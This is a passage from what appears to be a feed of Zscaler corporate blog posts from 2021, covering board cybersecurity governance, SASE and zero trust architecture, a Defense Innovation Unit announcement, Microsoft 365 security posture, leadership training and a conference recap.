management cascading from directors down to implementation teams, staying informed and being proactive is critical. But how can a board of directors, which is most likely not composed of cybersecurity experts, approach cybercrime risk mitigation from a leadership perspective? In one survey of enterprises, only slightly more than a third of respondents reported reviewing security concerns at least monthly. How often is cybersecurity on the top leadership’s agenda? 2020 Deloitte Cyber Survey: Cyber Security Leadership Chart Proactive demonstration of due diligence is a great starting point. Tapping into experts and (somewhat ironically) technology solutions to fill knowledge gaps is another. PwC recommends that boards explore the benefits of NIST CSF to foster effective communication and processes among all stakeholders. Here, we’ll explore a few ways directors can seek and achieve better cybersecurity governance for their organizations. The key is to approach this largely like other content areas where directors may not be specific thought leaders. Education, information, and dissemination can counter previously inadequate, hands-off, and even lackluster efforts. Realize the bigger picture You can’t know what you don’t know. A board of directors should start by reviewing reports from IT leaders and stakeholders in the organization. Bring in the experts and ask for a complete assessment of known gaps as well as evolving changes in your tech stack. You may need to design or implement additional reporting to ensure that your understanding is formed on a data- and fact-based level. From there, you can use the information to gain better knowledge of challenges, achievements, and recommended actions for improved cybersecurity policies moving forward. Assign security oversight responsibility Someone on the board (either a single member or a committee) should be assigned responsibility for learning the ins and outs of the company’s security needs and status. These individuals can provide ongoing updates and present larger issues for the broader board to assess and vote on. Committee members don’t have to be experts, but they can evolve into specialists. They can rely on internal specialists, third-party consultants, vendors, and technology solutions to plan ahead and better understand the landscape. Leverage objective measures Risk assessment is an ongoing process with new vulnerabilities surfacing daily. Bringing in third parties to identify loopholes in security compliance through methods like penetration testing can be quite insightful. Security consultants and supporting software applications can give great insight into the potential risks for your network. Consider a zero trust mentality As the name implies, the zero trust model assumes that anything attempting to enter, leave, or relocate within a network cannot be trusted and should be verified or cleared by a governing system. This can give companies a significant advantage given the patchwork of on-premise and cloud solutions, proprietary and third-party applications, and closed networks and shared access. Add remote work and innumerable devices to the mix, and the idea of trusting nothing can suddenly seem like the safest route. Companies can plug existing holes in their infrastructure and reduce long-term risk with this approach, and boards stand to learn much by researching this option. Create a culture of transparency While you certainly do not want to share details about any outstanding gaps in your cybersecurity protocols, transparency can still present benefits. In the event of a breach, disclose anything that should be declared to stakeholders and customers. This instills faith and trust that the board is doing everything in its power to address issues, protect data, and take ownership of any failings. The path forward is constantly shifting Above all, a board of directors must understand that cybersecurity is a dynamic discipline that requires unending monitoring and innovation. Laying the groundwork for reduced risk is essential but so is the knowledge that risk will always be there. Companies should also assess their existing insurance policies, whether they adequately cover asset value in the event of a breach, and if dedicated cyber insurance may help further mitigate risk. But no matter the size of your insurance policy, leadership must remain involved and educated in cybersecurity for the business and prepare policies and procedures in the event of a breach with an eye toward responsibility. Disclaimer: This article has been created by Zscaler for informational purposes only and may not be relied upon as legal advice. We encourage you to consult with your own legal advisor with respect to how the contents of this document may apply specifically to your organization, including your unique obligations under applicable law and regulations. ZSCALER MAKES NO WARRANTIES, EXPRESS, IMPLIED, OR STATUTORY, AS TO THE INFORMATION IN THIS DOCUMENT AND IT IS PROVIDED “AS-IS”. Information and views expressed in this document, including URL and other internet website references, may change without notice. Thu, 08 Jul 2021 08:00:01 -0700 Les Ottolenghi The (Thick) Branch is Dead. Long Live the (Thin) Branch. This post also appeared on LinkedIn. Even with the pandemic (hopefully) winding down, mass remote work will stick around for the foreseeable future. Twitter, Google, Facebook, Deutsche Bank and other globally recognized companies are letting their employees work from home at least through the summer, if not longer. But what about beyond? Comprehensive studies such as McKinsey indicate that most companies will keep work-from-anywhere (WFA) as a permanent part of their corporate strategy. But what does this look like? Based on my conversations with various companies in different sectors, the WFA answer isn’t black and white. Most likely, some split percentage of people in vs. out of the office will continue, and a new hybrid model will take hold as the norm. The next logical question is, what about the expensive investments in physical data centers located in high-priced office campuses? As companies dusted off their business continuity plans during the pandemic, many saw traffic and workloads shift quickly from complex network and security stacks to remote connections. What does this mean for legacy equipment and architectures? What do we do about the internet? Managing internet traffic is a significant portion of the IT department’s daily struggle. It makes up 40 to 70 percent of all corporate traffic. Continued adoption of SaaS applications like Microsoft 365, Workday, and ServiceNow will only increase this percentage. As more people work outside the corporate office and connect to more cloud-based applications and infrastructures, more traffic gets backhauled or "tromboned” via the classical IT infrastructure. This increase can congest and overwhelm legacy network security infrastructure. As more employees moved outside the office during the pandemic, legacy network and security setups struggled to handle the unanticipated onslaught of users working from home. Why? With very little time to prepare for quarantines, organizations couldn’t build or scale legacy infrastructure fast enough to meet new expectations, such as where, how, and when workforces were using apps. This lack of scalability led to a poor user experience for millions of remote workers afflicted by complicated security processes through friction-filled logins, complex architectures that made finding applications difficult, and poor applications due to backhauled internet-bound traffic. Frankly, many users confronted with this experience looked for quick ways to bypass controls. This behavior, while understandable, opened a new can of worms by increasing the network attack surface: each additional device that remotely tries to connect to corporate content is a potential attack vector! Get lean, get svelte, get “thin” A better alternative to the situation described above is using direct internet connections from the branch office. They’re certainly cheaper (even for higher bandwidths). But they do require proper security, which often ends in complex network and security stacks at the branch office. For remote work (or an office of one), this isn’t a viable option. The right approach is to replace the traditional heavy branch model with a cloud-centric, thin branch model using a Secure Access Service Edge architecture. In a paper, Gartner succinctly posits this concept in the way that only industry analysts can: Instead of forcing (via “tromboning”) various entities’ traffic to inspection engines entombed in boxes in the data center, we need to invert our thinking to bring the inspection engines and algorithms closest to where the entities are located. The chart below captures the difference between a heavy and thin branch: Heavy branch: Has security applied locally in the form of hardware. Thin branch: Relies heavily on centralized cloud control for managing security and access. Gartner suggests that most networking actions should be delivered from the cloud in WFA models. Any decisions not made in the cloud should be made as close to the edge as possible, with as light a touch on the device as possible. As we’ve seen play out the world over during the pandemic, a heavy-branch model required physical network changes to the systems that allowed employees to access applications and assets at branch locations. Upgrading equipment at every branch (e.g., VPN access) to accommodate growing traffic was cost-intensive, and procurement was slow since they were ordering new stacks of gear simultaneously with every other company. The thin-branch/heavy-cloud model provides more agility and can auto-scale to virtually meet any requirement since the compute is offloaded to a heavy cloud. Thin is cost-effective and secure With vaccinations and loosening social distancing requirements, companies will allow employees back into the office. They can ease back on some of the scaling they’ve done for branches, but how much? With expanded remote work here to stay, what happens to the investments made towards achieving a thin branch? Beyond where employees sit while they work, many companies will need to find ways to scale back costs. One method might be scaling back on physical locations completely. Using SASE architectures and Zero Trust models can enable a company to scale up connections faster than ever while scaling back on physical locations. During the crisis, I’ve watched companies go from tens of branch offices to thousands of branch offices — of one employee. Allowing employees to work wherever they want using whatever connections and equipment they want — secured by identity-based zero trust —means less overhead and a better employee experience for those who’ve found success and balance working from anywhere. On a side note, an article I read recently seems to suggest that some organizations will keep some hub-and-spoke architectures alive via an HQ and temporary satellite offices (e.g. rented office space like WeWork, Regus, etc.) to ensure that employees can meet and exchange work related plans. This isn't an architecture model, however, but a conceptual localization plan. In fact, the more companies adopt temporary meeting spaces for in-person gathering, the more they are going to need non-traditional security models that use identity to link users to applications It’s not inconceivable that many branch locations employing SASE Architectures could simply use 4G/5G SIM cards as a primary connection. With Zero Trust, this connection could provide the security, agility, and cost savings that would mean an acceleration to open new “branches.” There are many benefits from going thin from a security standpoint since you don’t need to constantly provision, update, and maintain hardware appliances. Nor do you even need an MPLS or VPN connection. That means you reduce your attack surface, complexity and costs. The office is dead; long live the office! The office as we know it is not yet dead, but the COVID-19 crisis has shown that the new hybrid workplace requires scalable solutions. Newer architectures such as SASE and Zero Trust that support today’s realities are replacing legacy networks and delivering the agility and resiliency that businesses need to compete and succeed in the modern, digital landscape. These architectures use the internet as the new corporate network and the cloud as the new data center. Zero trust architectures create less expensive and better-performing security by securing connections between users and applications and removing the need for costly infrastructure services. As the new hybrid workforce takes shape, thin branch office models that include work-from-home options will be necessary for modern business. Therefore, the office is dead, long live the office! Tue, 06 Jul 2021 08:00:01 -0700 Kevin Schwarz Defense Innovation Unit Issues Success Memo to Zscaler Today, we are proud to share that the Department of Defense (DoD) Defense Innovation Unit (DIU) announced that Zscaler successfully completed a Secure Cloud Management (SCM) prototype. The project launched in May 2020, and the evaluation confirms Zscaler can deliver fast, secure, and controlled access to SaaS cloud services directly over the Internet, simplifying DIU’s ability to engage with non-traditional technology vendors. A third party assessed the prototype using Defense Information Systems Agency (DISA)-developed criteria. DIU then issued a success memo to Zscaler, enabling Department of Defense (DoD) organizations to contract with vendors without needing to re-compete. “These solutions simplify engagement with non-traditional technology vendors by allowing DIU users to collaborate in real time. The solutions provide equivalent security and control to the DoD’s Cloud Access Point (CAP) while delivering real-time performance, which is critical for such things as videoconferencing and file sharing,” said John Chen, interim CIO for DIU. Zscaler is focused on giving customers access to modern, mission-critical applications, including those that require the most stringent security and work in some of the world’s most remote and challenging environments. “The DoD is working to strengthen cyber defenses on many fronts. DIU is exploring and testing new innovative approaches in security architecture. CMMC is in its final stages to improve security consistency to all contractors working with the federal government," said Patrick Perry, Director of Emerging Technology, Zscaler. "But, we have to approach things differently than in the past. Government as a whole can transform security by taking a user-centric approach, where the first priority is to protect the data, then provide secure access once contextual validation occurs, and finally applying appropriate security based on risk scoring – whether accessing the internet or applications that reside in an on-prem data center or using a cloud service." The Zscaler Zero Trust Exchange is consistent with the May 2021 Executive Order on Improving the Nation’s Cybersecurity, and with DISA’s recently published Zero Trust Reference Architecture. The DIU anticipates the project’s results will help inform DoD entities as they formulate their own zero trust plans. The Zero Trust Exchange platform includes Zscaler Private Access (ZPA), a FedRAMP-High JAB authorized network access service that connects trusted users directly to trusted cloud applications; and Zscaler Internet Access (ZIA), the first secure internet gateway solution to earn FedRAMP certification. ZIA is currently prioritized for FedRAMP-High JAB authorization. Benefits include: Zero attack surface – apps are never exposed to the internet; you can’t attack what you can’t see Direct connections to an app, not a network – segment of one, no exposure of any additional resources or data, no ability to move laterally or connect to C&C servers Proxy architecture, not passthrough – full content inspection including SSL; holds and inspects unknown files before reaching the endpoint Multitenant architecture – cloud-native, multi-tenant design; continuous security updates Secure Access Service Edge (SASE) – policy enforced at the edge in 150 DCs (SASE), peering in internet exchanges, hundreds of apps This project underscores the Pentagon’s continued modernization commitment. Maximum telework accelerated change and today, workforce expectations and needs continue to evolve. Cyber-adversaries continue to seek new ways to take advantage of vulnerabilities. Zero trust-based secure cloud access is core to the foundation for mission success. For more information, see the DIU’s press release here. Thu, 01 Jul 2021 17:22:54 -0700 Drew Schnabel Zscaler + Coursera: The Journey to Leading at Z Since its inception, Zscaler has always prioritized its people, searching diligently for the best talent and making employee retention a key focus. However, every company has its challenges with hiring and retention, and Zscaler is no exception. When I joined Zscaler in August 2020, I was the first member of a new team called talent development. My first goal was to assess the health of our people and culture strategies to figure out what was working well and where we could make improvements. Over several weeks, I spoke with leaders and team members across the company. There were a number of things that were going exceptionally well—we had a strong cultural compass in T.O.P.I.C. (Teamwork, Open Communication, Passion, Innovation and Customer Obsession), we had a high-performing recruiting engine that was scaling to enable our growth, and we had a team of people and culture professionals who were seen as true business partners. That said, we also had opportunities to be more intentional with our investments in the development of our people, especially our managers. For that reason, we set out to build programming that would enable all Zscaler leaders, aspiring through senior-level, to live and lead by our Leadership Principles. Based on what we learned through our discovery process, we set four design principles to guide our work: Leadership is a journey The best leaders are always looking to learn, grow, and improve. Everyone is great at something, but no one is great at everything Each of us has strengths. The magic happens when you can help people and companies leverage them. Development can be really simple Clear expectations + an understanding of how you’re doing against those expectations + focused opportunities to improve = Development. No one likes being told what to do, but most people appreciate a bit of direction Mandating training can undermine impact. Approaching development too “laissez-faire” can lead to it being deprioritized. Giving people “freedom within a framework” will leverage the benefits of both with the challenges of neither. In February 2021, we launched Leading at Z—clear expectations, a measurement tool we call the Manager Effectiveness Survey, and focused development opportunities aimed at enabling our leaders to live and lead by our Leadership Principles. To help us drive adoption, one of the greatest measures of success, we’ve built a microsite where all Zscaler employees can access each element of the program including development content from partners including Coursera, ExecOnline, and Rapid Learning, to name a few. This site is also where our people access crowd-sourced TED Talks, books, and other materials that align with our Leadership Principles. In a recent webinar with Coursera’s Deborah Mussomeli, I described how Zscaler is elevating training with the Coursera platform as we build a workforce for the cloud. Register here for the webinar. Leadership is a journey Leadership is a journey, one without a well-defined destination. With Leading at Z, we set out to enable Zscaler leaders’ success by helping them to enhance their skills and develop new ones. We do this by helping them understand where they are in their journey, and by offering the focused development that enables them to unlock their potential. We’ve only just got Leading at Z off the ground, but we’re thrilled with the engagement. We’re now focused on creating the virtual communities that enable our leaders to learn and grow together. Further, we’re leveraging our Leading at Z learnings to build the program we call Succeeding at Z, which will enable all Zscalers to identify their professional ambitions and progress towards them. Since its founding, Zscaler has focused on building a lasting company that enables its customers to succeed in the digital world. It is incumbent on the company’s leadership to create an environment that attracts great employees and allows them to thrive. Leading at Z is just the beginning, and I’m excited about its early indicators of success and the launch of what’s next. Stay tuned. To learn about career opportunities at Zscaler, please visit: Tue, 29 Jun 2021 08:00:02 -0700 Zero Trust Microsegmentation: It’s All About the Data The digital nature of today’s businesses puts significant pressure on cybersecurity practitioners to be everywhere—all the time. As a result, it’s easy to forget the fundamental reasons for managing and operating a security program. The reason for implementing good security practices—namely, microsegmentation—isn’t to achieve more secure workloads, devices, or people on the network, but to protect data. Data should be at the heart of every security strategy, and therefore every security framework, tool, and process used should be focused on the data itself. Yet security teams expend a tremendous effort to “secure the network” to try to keep the bad guys out. Doing so, however, is spreading security teams thin while failing to provide the context required to defend against modern adversaries. Effective implementations of microsegmentation keep data at the core of the strategy. While there are many different ways to accomplish microsegmentation, the goals of any initiative should be to: Improve visibility and breach detection Localize security controls around critical assets Reduce capital and operational expenses Reduce compliance costs Increase data awareness and insight Eliminate internal finger-pointing Enable digital business transformation Combining microsegmentation with a zero trust strategy is an even greater initiative. Not surprisingly, zero trust and microsegmentation have similar benefits; when merged into one security strategy, security teams have a hardened method to isolate data and systems, stop the propagation of malware, and truly understand what’s going on across their ecosystems. Protecting the data While zero trust microsegmentation allows security teams to better protect workloads, users, and devices, the key component of what a security program is supposed to focus on is protecting the data. Microsegmentation allows security teams to put the right segments, controls, technologies, and capabilities in place, and zero trust requires that everything trying to communicate across segments—inside and in between data centers and cloud environments—is continually assessed for proper authorization and authentication. Enforcement of controls in a zero trust infrastructure happens with every communication request, which means that data assets are always protected from lateral movement and propagation of malware, even if an attacker has already exploited an endpoint. Why? Because zero trust microsegmentation means that infected systems can be segmented away from other systems, that granular controls are in place to ensure the attacker can’t piggyback on approved policies to access desired systems or data, and that the core of the distributed network—the data—always remains isolated. On the other hand, once an attack moves past endpoint protection Without segmentation, on the other hand, once an attack moves past endpoint protection, there’s no way to stop it. This is exactly what happens in the infrastructure of a flat computer network. When segmentation—or better yet, microsegmentation—isn’t present, and when security controls determine that “you’re here, and you've been here before, so go ahead and keep moving.” Zero trust microsegmentation clamps down on such overly permissive networks because everything is designed to be isolated. Each application, host, and service is given its own segment that is protected by fine-grained controls based on the criticality and sensitivity of what’s inside that segment (i.e., data), not what may be traveling around outside of the segment (e.g., IP addresses, ports, and protocols; unmonitored communication pathways). A new form of segmentation Microsegmentation has a bad reputation, though. When security practitioners hear the term, many automatically associate it with unsuccessful projects of the past. Because most companies make extensive use of cloud computing and software-as-a-service, data stores are not always easy to find, and the data in them even harder to classify. This is why zero trust is so critical to microsegmentation. Zero trust places security controls directly around the data assets adversaries are targeting, uses least-privileged access controls, and only allows access to or between data assets after verification is met—every time a communication is requested. Localizing and isolating data assets becomes much easier. Security teams can stop focusing on trying to protect hundreds of thousands of endpoints and instead look at the data itself—what’s communicating and how. Zero trust microsegmentation you to place the greatest security controls around what’s most important (your data), where it is, and how it’s being accessed. Additional reading: Microsegmentation 101: What it is, how it works, and why it's key to a zero trust security strategy Is Microsegmentation a Security Project or an Infrastructure Project? How Microsegmentation Differs from Network Segmentation Thu, 01 Jul 2021 08:00:01 -0700 Nagraj Seshadri Why You Need SaaS Security Posture Management (SSPM) for Microsoft 365 Companies embrace Microsoft 365 (M365) to reduce IT complexity and drive end-user productivity and collaboration. Over 258 million people use the Microsoft 365 productivity and collaboration suite today. Featuring business-critical products such as Exchange, SharePoint, Word, Excel, PowerPoint, Outlook, and OneDrive, it’s not hard to see why it has become so popular. While M365 brings a range of benefits to organizations and users alike, it can also introduce challenges to your overall security posture and to your security teams. According to IBM Security’s 2020 Cost of a Data Breach, the attacks directed at cloud services, particularly collaboration tools like Microsoft 365, have increased significantly. Remote work due to the pandemic has been a significant contributor to M365 security incidents, as attackers know that many people are working from home on unmanaged devices and connecting over unsecured networks or VPNs. Security concerns are valid, as cybercriminals have shown that they’re more than capable of taking advantage of any security misconfigurations or shortcomings. One simple misconfiguration can expose an organization’s most sensitive data, leading to devastating financial and reputational consequences. The challenge for the IT security team is not only protecting sensitive data against internal threats but also retaining security, compliance, and uniform policy enforcement. Unfortunately, with limited resources, tools, and budgets, IT leaders are asked to do more with less, such as ensuring a healthy M365 security posture, maintaining the secure and compliant use of M365, and remaining agile in the face of unforeseen events. Microsoft 365 provides built-in policies, foundational and premium security controls, and systems. It analyzes 6.5 trillion signals every day to identify emerging threats. It includes native security at various levels (depending on your license). Overall, it does a good job securing data within its ecosystem, providing data protection within the operating system, applications, and documents, but it might not be enough for the enterprise. According to Gartner estimates, “50% of Office 365 deployments will rely on third-party tools to fill security and compliance gaps as well as maintain consistent security policies.” Six reasons why IT leaders should consider SSPM to protect their Microsoft 365 environments. Reason 1: Shared responsibility – Enterprises are still responsible for M365 configuration, secure deployment, crucial data, and access to the data. Enterprise responsibilities also include assessing security and compliance and maintaining a secure posture by identifying and correcting potential threats before they result in a breach. Enterprises often overlook a critical M365 security consideration: how to automate the security posture of M365 to reduce the risk of data loss due to configuration errors. Reason 2: Limited visibility – The increased use of the M365 platform compounds concerns about visibility, team collaboration, and increased surface attacks, and puts the enterprise at a high risk of ineffective control over M365. Reason 3: Limited control over sensitive data – Data leaks and breaches comprise the most severe M365 security threats. Broad data and application access privileges must be allotted to certain users and administrators, but in a dynamic business environment, people tend to move around and change roles—unfortunately, their privileges don’t always change with them, leading to over-privileged access. Such users have the potential to change configurations or accidentally share sensitive data inappropriately. Excess privileges are risky and compromise security, especially with sensitive M365 data. M365 and add-on apps make it easy to connect workers around the globe. But the M365 platform is primarily managed by the local administrator within the organization. Locally, manually managed applications are likely to drift out of security compliance over time and get exposed to internal and external threats. Reason 4: Security and compliance enforcement – Regulated industries must comply with ever-changing rules, including SOC 2, ISO 27001, NIST CSF, NIST 800-53, as well as industry and government requirements, such as PCI, HIPAA, and GDRP. Most of M365’s compliance features are limited to the platform. Access to the compliance features varies from licenses and products/applications. It creates unnecessary complexity, business risk, and operational stress to enforce security best practices. Reason 5: Rapid detection and response – The targeted attacks on M365 are rising in proportion to the growing adoption, which means that detection and response capabilities are essential. Enterprises need a proactive approach with automated risk detection through alerts and notification, policy enforcement, and guided remediation to mitigate the risk. Reason 6: Operational challenges – Most enterprises do not have a dedicated SaaS security budget or expertise, and their tools are limited. M365 includes multiple applications, and each one can have hundreds of controls and settings that need to be continually adjusted and tweaked to adapt to the changing needs of the enterprise. M365 has no set default policies or settings that can be relied upon to provide the necessary accesses and functionality while maintaining the required security. Hence, M365 is often left unsecured by the security team due to limited budget, visibility, and expertise. The solution It's a challenge to maintain a secure M365 posture, protecting sensitive data, and enforcing a consistent set of policies and remediation actions. With the complex M365 configuration setup and limited control and visibility, M365 configuration errors will remain a central issue that enterprises must confront and ultimately overcome if they want to get the most from their Microsoft 365 capabilities. Zscaler recommends an automated M365 security posture management approach with SSPM that identifies, prioritizes, and automatically remediates risk in a highly efficient and effective way. SSPM can audit sensitive configurations to allow automatic remediation of configuration errors and enforce critical security controls. Incident reporting and remediation workflow drive greater operational efficiency. Enforcing the same policies across all M365 services will also prevent policy enforcement gaps. SSPM, along with CSPM, will help you make the most of your M365 deployment and ensure that you continue to meet your security, compliance, and governance requirements. Projected benefits of SaaS Security Posture Management (SSPM) for securing the M365 environment. Reduced likelihood of a data breach. Less time that IT and security teams must spend monitoring, assessing, and governing risks manually. Increased visibility and control over M365. Adherence to ever-changing industry compliance rules and regulations—audit-ready reports with ease. Ease of deployment, instant visibility and control, and no burden on the IT team. Please connect with us directly to learn more about Zscaler CSPM/SSPM for M365 or schedule a demo. Mon, 28 Jun 2021 08:00:02 -0700 Mahesh Nawale How to Successfully Roll Out M365: Remote Work as a Transformation Template This post also appeared on LinkedIn. When I worked in the area of network and security architectures in a previous life, we’d plan, assess, and make IT decisions right after the new year. Now that we are approaching the end of the global lockdown, I think most IT departments are asking a lot of questions: what have we done rightly, wrongly, and what can we take away when moving forward. If I were still doing my old job, I would capitalize on the changes IT made that allowed people to successfully and securely work outside of the corporate office. Mass remote work made IT teams realize that legacy network security perimeters don’t scale well when rolling out work-from-home solutions—especially for traffic-heavy apps like Microsoft 365 (M365). Besides increased backhaul costs, tunneling all M365 traffic through branch or headquarter security perimeters drastically reduces performance and can cause M365 deployments to fail. The legacy problem Enterprise modernization is top of mind for CIOs. For many, M365 rollout and improved productivity in an increasingly geographically diverse environment are ongoing projects. Enterprise-wide adoption of M365 requires a serious review of how network architecture processes and secures traffic. Microsoft recommends breaking out M365 application traffic quickly and with no security (they promise that they are a secure source). But for most organizations this is a non-starter: They have a hub-and-spoke model that processes all branch traffic (including remote employees). They can’t use a split tunnel architecture or breakout locally (e.g., via SD-WAN). They have sacrosanct and legacy security policies. In traditional hub-and-spoke models, all internet traffic travels from the user, over the corporate network, and out towards the internet. Adding M365 creates an overwhelming amount of application traffic—even with many corporate HQs boasting “large pipes.” Figure 1. Perimeter security processing traffic before it heads to an internet destination. Beyond day-to-day M365 usage traffic, application updates for hundreds if not thousands of users can easily overwhelm enterprise infrastructure’s capacity. IT teams’ frustration when fighting to maintain employee productivity when using “productivity” software is understandable—and not a particularly good look for an M365 rollout in general. Simply scaling existing physical network capacity isn’t a good solution, either. Doubling the size of your physical network architecture capacity often means doubling the size of your WAN OPEX spend (not to mention the CAPEX cost of new equipment). It doesn’t solve the problem long-term (given Moore’s Law, you’ve put it off for a year, maybe), and you aren’t winning any executive friends or building executive team trust. It can cause M365 deployments to fail before they start. Moving forward I have a better answer: use the internet as your network. One of the (very few) upsides of the pandemic is proof that using the internet as the corporate network is a secure transport solution. COVID-19 forced companies to send all employees to work from home. In essence, these home offices became “branches of one.” When remote traffic flooded legacy enterprise networks via these “branch” office connections (often over VPN), application and network performance took a hit. The better move is to let remote users access cloud applications directly from their local internet connections. But you need to secure those direct connections. Many companies solved the problem by coupling direct internet access with inline cloud security. With direct internet access, it’s unnecessary to backhaul traffic through complex perimeter security stacks, no matter where the users or applications sit. Instead, it can use the internet to directly connect to applications. Traffic is sent directly and securely to its destination, eliminating the need for backhaul, reducing latency, and removing complex security stacks at the HQ or branch edge. Figure 2. Direct internet connectivity for Internet and SaaS workloads Using an inline security solution: Offloads internet traffic from the network (up to 60% of your traffic is bound for the internet) using local internet as your transport layer Reduces latency by sending cloud-application traffic directly to the cloud Reduces MPLS traffic and associated costs Provides corporate-perimeter-level security to remote users Increases visibility into user and workload activity for security and performance optimization. The pandemic made remote workers an ideal test case for accelerating M365 rollouts by successfully showing that direct internet access can provide an “on-premises” experience no matter where users work. You can apply this test case to examine where direct internet connections could be a better solution than legacy architecture. With most users working remotely and creating more traffic for your WAN/MPLS connections, an inline cloud security solution lets you adopt the internet as a critical element in your connectivity strategy. It’s crucial to analyze your overall enterprise security strategy and work in conjunction with the various infrastructure teams to examine what guidelines, restrictions, and governance might limit immediate action. Determine if a cloud security solution that allows direct internet access to cloud applications allows for more local internet breakouts. Gartner describes a “Thin Branch/Heavy Cloud” model based on a Secure Access Service Edge (SASE) architecture, where security is pushed out of the physical network and into the cloud. Keep this model as your guide, and don’t over-complicate your network with unnecessary products if you can simply forward traffic directly to the internet. Zero trust eliminates legacy dependence A zero trust cloud security solution can help you easily make the most out of productivity software investment and pandemic response solutions and help accelerate M365 adoption. You have to work closely with networking, end-user, and security teams to identify solutions that can simplify network and security architectures using SASE solutions. By offloading traffic from your network to the internet securely, you can reduce dependence on legacy networking and security architectures. That means accelerated M365 adoption, greater productivity, and, ultimately, better business outcomes. The vast number of remote employees is an unprecedented opportunity—make them your test case that demonstrates a successful direct-to-internet M365 deployment. They can be the critical mass that highlights how the internet can be your your transport layer, and accelerate your secure digital transformation. Thu, 24 Jun 2021 08:00:01 -0700 Kevin Schwarz The Asia-Pacific Region is Moving Full Cloud Ahead Zenith Live APJ marks the end of what I believe was our most extensive and possibly our best Zenith Live to date. First of all, thank you to all our attendees, customers, partners, and speakers across the Asia-Pacific region whose enthusiasm and insights made this event as successful as it was. Zenith Live APJ featured two days of real-world accounts of business transformation, with keynotes, panels, demos, and training, leaving us all with a lot to explore further as we move forward together on our transformation journeys. With that in mind, I wanted to share a quick summary of this year's Zenith Live APJ so you can catch up on anything you may have missed. Let's begin with day one. Day one highlights Kicking things off was Zscaler CEO Jay Chaudhry, who started the conference by acknowledging how challenging last year was for IT teams around the globe. Yet, perseverance and quick thinking kept organizations running and employees working. He also touched on how the pandemic expedited the need to build modern infrastructures around zero trust. In Jay's words, "IT has proven time and again its resilience in not just adapting to change but being the catalyst for change." Continuing, he detailed how our cloud-native platform, the Zscaler Zero Trust Exchange, assisted countless customers in quickly transitioning to work-from-anywhere, while enabling new capabilities for the returning hybrid workforce. He highlighted the three ways the Zscaler platform is helping businesses transform. They include modernizing the workplace to enable work from anywhere, eliminating the attack surface to reduce risk by transforming security so that it can be everywhere, blocking cyberattacks, preventing data loss, and stopping lateral threat movement. You can watch Jay's keynote and many of the other sessions on-demand: Insights from APJ CXO panel Following Jay's opening remarks, I took the digital stage with top APJ CXOs, including Mohit Kapoor of Mahindra Group and Lucious Lubo of Tech Mahindra. During this CXO panel, I had the pleasure of chatting with both leaders about how they securely leveraged the power of the cloud to modernize their businesses, offer more products and services, and drive innovation, all while streamlining their digital footprints. Mohit and Lucious both cited security built around zero trust as a critical factor in their ability to modernize at the speed they did, allowing them to quickly scale secure app access for employees, partners, and customers. Moreover, both Mohit and Lucious spoke to me about the very real threats to their supply chain, factories, and manufacturing processes with the recent uptick in these sorts of attacks. With Zscaler, not only can they better protect these systems, but they can also identify and recover from threats in real time. Leading change: Women in IT Also, on day one was our fireside chat, Women in IT: Expanding Influence and Leading Change. Tanya Graham, Executive General Manager of Strategic Programs at Healthscope, joined Zscaler's Kavitha Mariappan for a candid conversation about C-level attainment and making an industry-wide impact by leveraging emotional intelligence, mentoring others, and conviction. During this session, both leaders touched on how you can advocate for inclusion by using your career story to inspire a new generation of leaders—and how all leaders can champion the creation of supportive and equitable workplace communities. Day two highlights Day two began with part two of "Innovating at the Speed of Cloud," with Amit Sinha, Steve House, and Tony Paterra. This session covered enhancements across the Zscaler platform, including inline and out-of-band CASB for better data protection and compliance. Moreover, they shared insight into security innovations, including more robust threat protection and expanded Cloud Browser Isolation capabilities in ZIA and ZPA services to isolate users and devices from potentially risky content. Customers provided powerful insights The morning continued with insights from Rasik Vekaria of BP, David Branik of DHL, and Andrew Baker of Absa group. During these inspiring sessions, all three leaders addressed how they improved business agility and resiliency despite the pandemic.. Each customer exec shared how they are using zero trust to successfully modernize their companies and deliver enhanced user experiences and improved security to their employees—regardless of location. All of us here in APJ are grateful to all the customers who joined us and spoke at Zenith Live in keynote sessions, panels, and technical breakout sessions. Thank you! ThreatLabZ keynote: Insights from the front lines of the world's largest security cloud Zscaler ThreatLabZ experts presented research into emerging attacks discovered and analyzed with our world's largest security cloud. The panel dissected recent attacks while sharing best practices on securing your enterprise from sophisticated threats targeting your software, supply chain, Microsoft Exchange servers, and more. That said, this session wasn't all doom and gloom. Deepen Desai detailed how Zscaler's disruptive protection suite unifies our industry-leading threat intelligence, world-class experts, and innovative technology to give you peace of mind from the most advanced attackers. Partners highlighted their commitment to secure transformation Creating a robust ecosystem of partners whose technologies complement the Zscaler Zero Trust Exchange is critical for successfully helping customers become more secure, agile, and resilient in the APJ region. Today's partner summit celebrated precisely that—a group of technology evangelists and leaders joining forces to continue the digital transformation momentum over the next year and beyond. This concludes Zenith Live APJ 2021 and what an event it was. On behalf of Zscaler, I would like to thank you for making this our best Zenith Live yet! We hope you found our speaker sessions, training, panels, and workshops informative and relevant as you continue moving full cloud ahead. If you missed Zenith Live, be sure to view sessions on demand: We hope to see you next year! Wed, 23 Jun 2021 13:32:28 -0700 Scott Robertson How Getting Outside Your Comfort Zone Will Change Your Career We all have aspirations of the person we want to become and the things we want to achieve. Humanity has benefitted countless times from the ripple effects of such visions. But ask anyone who tasted the success of their dreams in fruition, and you will learn that you cannot become the person you are destined to be if you stay in your comfort zone. Realizing your wildest dreams requires growth, expansion, and change. You have to commit, at least temporarily, to the struggle. If something scares you a little, if you have butterflies in your stomach and you are wondering, “Can I do this? Am I going to fail?” Those are signs of leaning into the challenge. Growth happens when you stretch yourself and change the narrative about what is possible. True success stems from taking risks, being unafraid to fail, and committing to constant learning. Throughout my career, it’s also been clear to me that an individual’s path to success will accelerate through outstanding leadership. I’ve been fortunate to learn different leadership, communication, and management styles, as well as go-to-market systems, processes, and methodologies from exceptional leaders. I believe in paying it forward. As I’ve gone through my leadership career, it’s been my mission to build foundational platforms through which others can learn, grow, evolve, and become the best versions of themselves at a broad scale. Our ambition at Zscaler is about more than just numbers. We are building a true “home” for talented people who can grow with us for many years to come. I’ve had two recent opportunities to reflect and share my ideas around the building and executing a Go-To-Market motion. As I discuss in the webinar with Sandi Lurie, VP of Talent Acquisition at Zscaler, it’s imperative to present your Team with the right opportunities on an ongoing basis. It was clear to me that Zscaler was an exceptional opportunity to shape an industry and provide the platform for everyone involved to experience expansive personal growth. We have the chance to do something special and say, “let me rediscover and reinvent myself, and I’ll build a platform for others to do the same.” I also had the pleasure of joining a recent Podcast episode with People.AI. We discussed more of the methodology behind cultivating success strategically and at scale. One key element is to deliver consistent training for both individual contributors and their leaders. If we can create an environment where intellectual, professional, financial, and career growth opportunities abound—then not only will revenue inevitably 